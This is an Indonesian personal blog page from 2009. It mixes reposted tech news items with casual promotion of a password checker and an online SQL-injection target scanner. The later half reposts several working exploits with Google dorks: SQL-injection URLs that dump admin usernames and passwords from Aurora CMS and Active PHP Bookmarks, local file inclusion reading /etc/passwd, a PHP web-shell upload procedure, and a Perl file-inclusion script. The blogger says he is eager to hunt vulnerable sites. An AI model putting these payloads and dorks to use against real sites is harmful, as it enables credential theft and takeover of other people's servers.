1

Berita Lokal Mendunia via Twitter di 2009

Monday, 28 December 2009

Peristiwa yang terjadi di Indonesia tidak hanya mendunia lewat bantuan media asing. Mikroblogging Twitter bisa jadi telah berperan cukup besar dalam memperkenalkan Indonesia, baik maupun buruk, ke dunia internasional.

Meski belum diketahui berapa banyak pengguna internet di Indonesia yang tergabung menjadi bagian dari Twitter, namun tercatat, tema tentang peristiwa di Indonesia sempat beberapa kali muncul dalam 10 besar trending topics. Ini merupakan bukti jika pengguna Twitter di Indonesia cukup banyak.

Trending Topics sendiri muncul ketika Twitter mencoba untuk berbenah dengan menggelontorkan fitur-fitur baru. Fitur lainnya yang masuk bersamaan dengan Trending Topics adalah fitur ReTweet dan List. Namun berdasarkan fungsi dan kegunaannya, fitur ReTweet paling banyak digunakan. Sedangkan Trending Topics hanya cukup menarik perhatian.

Fitur Trending Topics merupakan kumpulan tema terhangat yang sedang menjadi pembicaraan para pengguna Twitter. Pengguna Twitter yang kebanyakan berasal dari mancanegara membuat kontribusi topics yang paling sering muncul memang berasal dari dunia internasional. Meski sesekali. Indonesia sempat berkontribusi dalam Trending Topics ini, khususnya jika ada peristiwa yang cukup menarik dibicarakan atau diperdebatkan di kalangan pengguna Twitter tanah air.

Menurut data TwitterHolic, mereka memperkirakan ada lebih dari 10.000 pengguna Twitter yang berasal dari Indonesia. TwitterHolic sendiri merupakan situs statistik yang memberikan informasi mengenai pengguna twitter teraktif dan terbanyak di Indonesia. Situs statistik yang tidak memiliki afiliasi langsung dengan twitter ini mendeteksi ada sekira 10.662 pengguna Twitter di Indonesia.

Berikut ini beberapa trending topics lokal yang berhasil memeriahkan Twitter,

#Bomb Jakarta
Peristiwa pengeboman yang terjadi di Jakarta cukup membuat heboh pengguna Twitter. Peristiwa yang berlangsung pada 17 Juli lalu ini sempat masuk dalam 5 besar trending topics. Jika Ritz Carlton masuk menduduki posisi 4 Trending Topics di Twitter, topik dengan istilah Jakarta berhasil menduduki posisi kedua di top trending topics. Bahkan, topik ini mengalahkan perbincangan mengenai Michael Jackson yang saat ini menduduki posisi 6 trending topics di Twitter. Serta mengalahkan topik mengenai pemilu di Iran. Namun topik mengenai Harry Potter masih menjadi perbincangan hangat dan mendominasi Tweet di Twitter.

#MbahSurip
Kematian Mbah Surip langsung mendunia di Twitter. Bahkan, topik mengenai Mbah Surip menjadi trending topik nomor 1 mengalahkan Bill Clinton dan menyingkirkan Michael Jackson. Mbah Surip merupakan penyanyi yang cukup fenomenal melalui lagunya yang bertajuk 'Tak Gendong'. Entah seberapa kuat fenomena Mbah Surip sehingga mampu mendunia di Twitter. Padahal Indonesia bukanlah pengguna Twitter terbesar. Apalagi, lagu Mbah Surip sendiri belum pernah diperdengarkan maupun disadur ke dalam bahasa Inggris. Kematian Mbah Surip sendiri terjadi pada 4 Agustus lalu.

#Batik
Twitter menampilkan dua tema berkaitan dengan batik, yaitu 'Happy Batik Day' dan 'Batik'. Keduanya masuk dalam 10 besar trending topic. Jika 'Happy Batik Day' berada di posisi 7 maka kata 'Batik' saja masih menempati posisi 9 di trending topic Twitter. Rupanya 'Happy Batik Day' lebih mendunia ketimbang 'Batik'. Buktinya pengguna Twitter dari luar Indonesia juga mendukung kebudayaan asli Indonesia ini dengan menyematkan kata 'Happy Batik Day' dalam setiap tweet mereka. Sedangkan pengguna tweet 'Batik' kebanyakan berasal dari dalam Indonesia. Trending topics ini berlangsung pada 2 Oktober lalu, sesaat setelah Unesco meresmikan Batik sebagai warisan budaya Indonesia.

#IndonesiaUnite
Dua ledakan bom di Jakarta memang sempat menduduki trending topics di Twitter. Namun tak lama, trend tersebut berganti menjadi #IndonesiaUnite. Gerakan yang berupaya menyadarkan Indonesia agar tidak takut terhadap teror bom ini sempat menduduki posisi 1 dalam daftar Trending Topics.

#BukaSemangatBaru
Coin A Chance, sebuah gerakan sosial yang mengumpulkan 'recehan' atau uang logam untuk membantu anak-anak putus sekolah baru saja meluncurkan sebuah program baru, 'Coin-Collecting Tweets' (CCT). Program CCT hadir atas kerjasama antara Coin A Chance dengan perusahaan minuman ringan Coca Cola. Melalui CCT, para donatur yang berada di luar Jakarta bisa menyalurkan uang receh mereka dengan memasang hashtag #bukasemangatbaru di Twitter. Satu hashtag akan dihargai sekira Rp100.

#Gempa
Di dalam situs mikroblogging tersebut, setidaknya ada tiga kata kunci yang masuk di dalam daftar paling populer tersebut, yaitu 'Jakarta', 'Gempa' dan 'Earthquake. Dan dari ketiganya, kata Earthquake yang masuk paling atas, dengan menempati posisi ke lima. Kejadian gempa yang berlangsung pada bulan Oktober ini langsung menyita perhatian pengguna Twitter.

#IndonesiaBanget
Pada bulan November, sebuah hashtag secara tidak sengaja terbentuk. Hashtag dengan tajuk #IndonesiaBanget itu menunjukkan keunikan-keunikan Indonesia. Meski tidak sampai menduduki posisi satu namun #IndonesiaBanget cukup puas bertengger di posisi dua. Tidak heran. Pasalnya, hashtag tersebut mampu menghasilkan sekira 8500-an tweet dalam kurun 16 menit.

#PendetDance
Terdapat tiga hashtag untuk kategori tari Pendet ini di twitter, yaitu #PendetDance, #PendetIndonesia, dan #Bali. Beruntungnya, masing-masing topik tersebut masuk ke dalam 10 besar trending topics di Twitter. Hashtag ini muncul setelah berita mengenai aksi Malaysia yang mengklaim tari Pendet merupakan budaya negeri Jiran tersebut tersebar melalui sebuah video Visit Malaysia. Sontak, warga Twitter langsung memberitahukan kepada dunia melalui Twitter, dengan cara ini.

#Menculik Miyabi
Oktober silam, film Menculik Miyabi menjadi kontroversi. Pasalnya, film ini benar-benar akan melibatkan bintang porno asal Jepang, Maria Ozawa atau yang lebih dikenal sebagai Miyabi. Meski tidak menduduki posisi teratas, namun hashtag dengan tajuk Menculik Miyabi sempat menduduki posisi 10 besar dalam trending topik di Twitter.

khusus yang diatas gw gw dah nunggu banget filmnya... T.T
2

Seks, Topik Paling Dicari Anak-Anak di Internet


SAN FRANCISCO - Bimbingan orangtua dalam mendampingi anak untuk mempelajari dunia maya dinilai sangat penting. Pasalnya anak-anak dapat dengan mudah mengakses situs-situs berbau pornografi atau kekerasan di dunia maya.

Berdasarkan temuan perusahaan penyedia solusi keamanan Norton, Seks merupakan topik yang paling sering diburu anak-anak sepanjang tahun 2009. Demikian dilansir AFP, Jumat (18/12/2009).

Norton mengungkapkan, tiga situs yang paling sering diakses anak-anak dan

remaja berusia 18 tahun ke bawah adalah YouTube, Google, dan Facebook. Parahnya lagi kata kunci yang paling sering diburu adalah 'Porn' dan Seks'.

"Orang tua berarti harus semakin meningkatkan pengawasan dan memberikan peringatan kepada anak-anaknya tentang konten yang tak diperuntukan untuk anak-anak," tulis Symantec.

Akses internet tehadap pornografi kebanyak dilakukan oleh anak laki-laki sedangkan anak perempuan lebih banyak menelusuri topik-topik seperti film, berita selebriti, musik dan acara-acara televisi.

Boys' top 25 searches centered on social networking, games, shopping, and "adult terms," according to Norton.

Data ini, menurut Symantec hasil dari pencarian sekira 14,6 pencarian yang dikumpulkan sejak 2 Februari hingga 4 desember 2009.

"Ketika pornografi telah menjadi ancaman, orang tua harus lebih mengawasi anak-anaknya ketika menelusuri konten-konten internet,' ujar Norton Internet safety advocate Marian Merritt.
0

Melacak Kedatangan Sinterklas Melalui Website


COLORADO - North American Aerospace Defense Command (NORAD) menyediakan layanan khusus untuk memeriahkan kegembiraan Natal bagi anak-anak. Layanan tersebut berupa website khusus untuk melacak keberadaan Sinterklas.

Anak-anak yang tak sabar menanti kedatangan Sinterklas bisa mengetahui update terbaru untuk mengetahui dimana pria berjanggut nan baik hati itu berada.

NORAD mengklaim bahwa mereka mengerahkan semua peralatan canggih untuk membuntuti dan melacak kemana Sinterklas dan rusa-rusanya pergi berkeliling dunia untuk mengantarkan hadiah.

Telegraph, Kamis (24/12/2009) melansir, tradisi melacak keberadaan Sinterklas sudah dilakukan NORAD sejak 1955. NORAD yang saat itu bernama Director of Operations at Continental Air Defense Command (CONAD) menyediakan saluran telepon khusus bagi anak-anak yang menantikan kedatangan Sinterklas.

Kepala CONAD saat itu menginstruksikan stafnya untuk memberikan informasi terbaru mengenai keberadaan dan posisi Sinterklas. Maka sejak saat itu,

ahirlah tradisi melacak keberadaan Sinterklas di Colorado.

Kala itu mereka didorong untuk menelepon nomor hot line yang disediakan CONAD untuk mencari informasi keberadaan Sinterklas. Antusiasme anak-anak yang ingin segera bertemu Sinterklas membuat trafik panggilan telepon CONAD membludak dan bahkan sempat mengalami eror.

Kini jaman telah berganti, teknologi pelacak Sinterklas pun tak lagi menggunakan telepon. Sekarang NORAD menawarkan layanan pelacak Sinterklas tersebut ke anak-anak di seluruh dunia dengan memanfaatkan layanan Google Earth Map. Layanan ini menyediakan informasi dalam tujuh bahasa termasuk bahasa Inggris, Spanyol dan China.3

Untuk meyakinkan anak-anak, NORAD menyebutkan mereka menggunakan teknologi radar dan satelit untuk melacak sinyal cahaya infra merah yang dipancarkan dari hidung merah Rudolph, salah satu rusa kutub yang setia menemani Sinterklas berkeliling membagikan hadiah.

sekarang yang jadi pertanyaan gw pa bisa ya sinterklas ntuh dilacak ???????
0

Netter Habiskan Waktu Online 13 Jam Seminggu


WASHINGTON - Hasil jajak pendapat terbaru di AS menyebutkan rata-rata pengguna internet atau netter menghabiskan waktu sekira 13 jam per minggu untuk berselancar di dunia maya.

Jajak pendapat interaktif yang diadakan lembaga survei Harris menemukan sekira 80 persen orang dewasa di AS selalu online dimana pun mereka berada. Data statistik menunjukkan jumlah jam yang bervariasi. Namun secara rata-rata, umumnya para pengguna internet tersebut menghabiskan waktu 13 jam setiap minggunya.

Selain jumlah rata-rata, diketahui ada 20 persen pengguna yang online selama dua jam atau kurang dalam satu minggu. Ada pula pengguna yang betah online selama 24 jam atau lebih, kelompok ini menempati porsi sekira 14 persen. Demikian keterangan yang dikutip dari CNet, Senin (28/12/2009).

urvei Harris pun menemukan rata-rata jumlah jam yang dihabiskan untuk aktivitas online setiap minggunya terus bertumbuh dari tahun ke tahun. Melesat menjadi tujuh jam dari tahun 1999 ke 2002, delapan hingga sembilan jam dari 2003 ke 2006, dan mencapai 11 jam di tahun 2007.

Level tertinggi mencapai puncaknya pada hasil survei bulan Oktober 2008 mencapai 13 hingga 14 jam. Kelompok usia yang paling banyak menghabiskan waktu di internet setiap minggunya terdiri dari orang-orang dewsa berusia 30 hingga 39 tahun. Saat ini total pengguna internet dewasa di AS adalah 184 juta, atau sekira 80 persen dari total populasi.

Data statistik ini kurang lebih hampir sama dengan data tahun 2008 namun merupakan lompatan angka yang sangat besar jika dibandingkan dengan data pada 1999. (rah)

wah kalo menurut saya biasa saya malah lebih dari 13 jam.. hwhehhehehe...
0

raphid checker online


nah teman2 mungkin dah tau sebagian cara menggunakan tools yang satu ini...
kita liat ja sebelah kanan kita nie..

disitu tinggal taruh password dari rapid pa bisa ato gak....

ya gw juga kurang ngerti pake nya ya pokoknya enjoylah....
wkakkaka :D
0

Sql Scan Online


hahahahah..
memang tools sekarang makin keren ja contohnya tanpa harus cape cari target sql tinggal kita taruh ja disini ..


ntr semua hasil scan web yang dia searching pasti dapat tapi kelemahannya yaitu hanya beberapa saja yang dapat tergantung dari berapa nomor id yang kamu masukan jadinya silahkan coba dont wory gak davirusnya kok...

kalo mau jadi hacker ya harus berusaha ..
kalo menurut gw lebih enak nginjek manually.. :P
0

Aurora CMS Remote SQL Injection Exploit

Wednesday, 23 December 2009
# Title: Aurora CMS Remote SQL Injection Exploit
# EDB-ID: 10609
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Sora
# Published: 2009-12-22
# Verified: no


# Download
  • Exploit

  • # Download N/A

    view source
    print?
    # Exploit Title: Aurora CMS Remote SQL Injection Exploit [content.php]
    # Date: December 22nd, 2009
    # Author: Sora
    # Software Link: http://www.auroracms.com.au/
    # Version: 1.0, 2.0, and 3.0
    # Tested on: Windows and Linux
    ------------------------------------------------
    > Aurora CMS Remote SQL Injection Exploit
    > Vulnerability in: content.php
    > Found and disclosed by: Sora
    > Contact: vhr95zw [at] hotmail.com

    > Google dork: "Aurora CMS"

    Aurora CMS suffers a remote SQL injection exploit in content.php.

    The type is UNION statement SQL injection.

    # Code: http://www.site.com/content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users--

    # Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!

    0

    Turut Berduka Cita.

    Tuesday, 22 December 2009



    walaupun saya terlambat tahu atas berita ini saya mewakili keluarga besar IDC tarakan mengucapkan Turut berduka cita sedalam-dalamnya atas meninggalnya nenek dari saudara kita don tukulesto..
    semoga amal dan ibadah nya diterima disisinya..
    Amien...

    0

    Stop Korupsi




    PROKLAMASI! (2009)

    Kami Bangsa Indonesia, dengan Ini Menyatakan Kemerdekaannya Dari KORUPSI dan KESEWENANG-WENANGAN.
    Hal-hal yang menyangkut Pemberhentian Secara tidak terhormat Pejabat-Pejabat yang terlibat/terkait/Tersangkut Pemufakatan Jahat, Berkomplot Dan KKN
    Dilakukan dengan cara Tanpa Pandang Bulu Dan Dalam tempo yang sesingkat-singkatnya tanpa Anarki Dan Tanpa Basa-basi.

    Jakarta, 9 Desember 2009
    Atas nama Bangsa Indonesia

    from :
  • antisecradio
  • 0

    Active PHP Bookmarks v1.3 SQL Injection Vulnerability

    # Title: Active PHP Bookmarks v1.3 SQL Injection Vulnerability
    # EDB-ID: 10597
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Mr.Elgaarh
    # Published: 2009-12-22
    # Verified: yes
    # Download
  • Exploit Code

  • # Download N/A

    view source
    print?
    # Title: Active PHP Bookmarks v1.3 Remote SQL Injection Vulnerability
    # EDB-ID: ()
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Mr.Elgaarh
    # Published: 2009-12-21
    =============================================================
    ~ Author : Mr.Elgaarh
    ~ Email : scan_cmpu@yahoo.com
    ~ Home : http://securityreason.com/
    =============================================================

    Dork : "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id=

    ./Exploit:

    first search for the admin username :
    ex : http://server/path/view_group.php?id=-4

    ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--

    admin panel path : http://server/path/cookie_auth.php?action=cookie_login

    ---------------------------------------------------------------------------------------------------------------------------
    Greets : Mado - Dr.Hacker - Mr.Max - broken proxy - Offensive Security - AG-Spider - ISlamic Defenders Crew -


    0

    mypage v0.4 Local File Inclusion Vulnerability

    # Title: mypage v0.4 Local File Inclusion Vulnerability
    # EDB-ID: 10600
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: BAYBORA
    # Published: 2009-12-22
    # Verified: yes
    # Download
  • Exploit Code

  • # Download N/A

    #############################################################
    # mypage0.4 LFI Vulnerability

    # Author: BAYBORA

    # Site: www.1923turk.biz

    ##############################################################

    # Exploit:


    Vuln file: index.php?page=LFI


    Exploit:


    POST http://server/index.php?page=../../../../../../../../etc/passwd

    index.php

    if(isset($_GET['page'])){
    ...
    $inhalt=$inhaltsordner."/".$_GET['page'];}
    ...
    $inhalt=str_replace("///","",$inhalt);
    if (FALSE==include$inhalt){echo$notfound;}
    0

    Mini File Host v1.5 Remote File Upload Vulnerability

    # Title: Mini File Host v1.5 Remote File Upload Vulnerability
    # EDB-ID: 10601
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Mr.Z
    # Published: 2009-12-22
    # Verified: no
    # Download
  • Exploit Code

  • # Download N/A

    =====================================================================

    =========
    _ _ _ _ _ _
    / \ | | | | / \ | | | |
    / _ \ | | | | / _ \ | |_| |
    / ___ \ | |___ | |___ / ___ \ | _ |
    IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


    =====================================================================

    =========
    [»] ~ Note : This vulnerability allows you to upload if the "storage" file isn't protected with a htaccess file or

    anything else
    =====================================================================

    =========
    [»] Mini File Host v1.5 Remote File Upload Vulnerability
    =====================================================================

    =========

    [»] Script: [ Mini File Host ]
    [»] Language: [ PHP ]
    [»] Site page: [ Mini File Host v1.5 ]
    [»] Download: [ http://www.hotscripts.com/listing/mini-file-host/ ]
    [»] Founder: [ Mr.Z ]
    [»] Greetz to: [ all muslims , ViRuSMaN ]

    ###########################################################################

    ===[ Exploit ]===

    Click on "Browse" and select your php shell
    Click Upload
    After it finishs , you will see this meassage (

    Your file was uploaded!

    Your download link

    http://server/script/download.php?file=328shell.php

    )

    Copy the new Name of the shell "328shell.php"

    Now Go to this Url

    http://server/script/storage/328shell.php

    if "Storage" wasn't protected your shell will open


    Author: Mr.Z <-

    ###########################################################################
    # Title: Simple PHP Blog v0.5.1 Local File Inclusion Vulnerability
    # EDB-ID: 10604
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: jgaliana
    # Published: 2009-12-22
    # Verified: no
    # Download
  • Exploit Code

  • # Download N/A

    view source
    print?
    # Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly
    # sanitize user-supplied input.

    #An attacker can exploit this vulnerability to obtain potentially sensitive information or to #execute arbitrary local scripts in the context of the webserver process. This may allow the #attacker to compromise the application and the underlying computer; other attacks are also #possible.

    # Simple PHP Blog 0.5.1 is vulnerable; other versions may also be affected.

    #!/usr/bin/perl
    # Local File Include Exploit
    # Simple PHP Blog <= 0.5.1
    # jgaliana isecauditors=dot=com
    # Internet Security Auditors

    use LWP::UserAgent;

    if ($#ARGV < 3) { die("Usage: $0 "); }
    $ua = LWP::UserAgent->new;
    $ua->agent("Simple PHP Blog Exploit ^_^");
    $ua->default_header('Cookie' => "sid=$ARGV[3]");
    my $req = new HTTP::Request POST =>
    "http://$ARGV[0]$ARGV[1]/languages_cgi.php";
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("blog_language1=../../../../..$ARGV[2]");
    my $res = $ua->request($req);

    if ($res->is_success) {
    print $res->content;
    } else {
    print "Error: " .$res->status_line, "\n";
    }

    #$ perl simple.pl example.com /blog /etc/passwd |head -1
    #root:*:0:0:root:/root:/bin/bash

    from :
  • Offensive Security

  • wahhh.. capenya edit blog padahal dah lama banget gak update blog sekarang saatnya kembali keasal ku dunia maya dunia yang penuh dengan peperangan yang menurut gw asyik banget,,

    gw gak tahan lagi buat cari web yang vuln nie... tunggu kedatangan q :D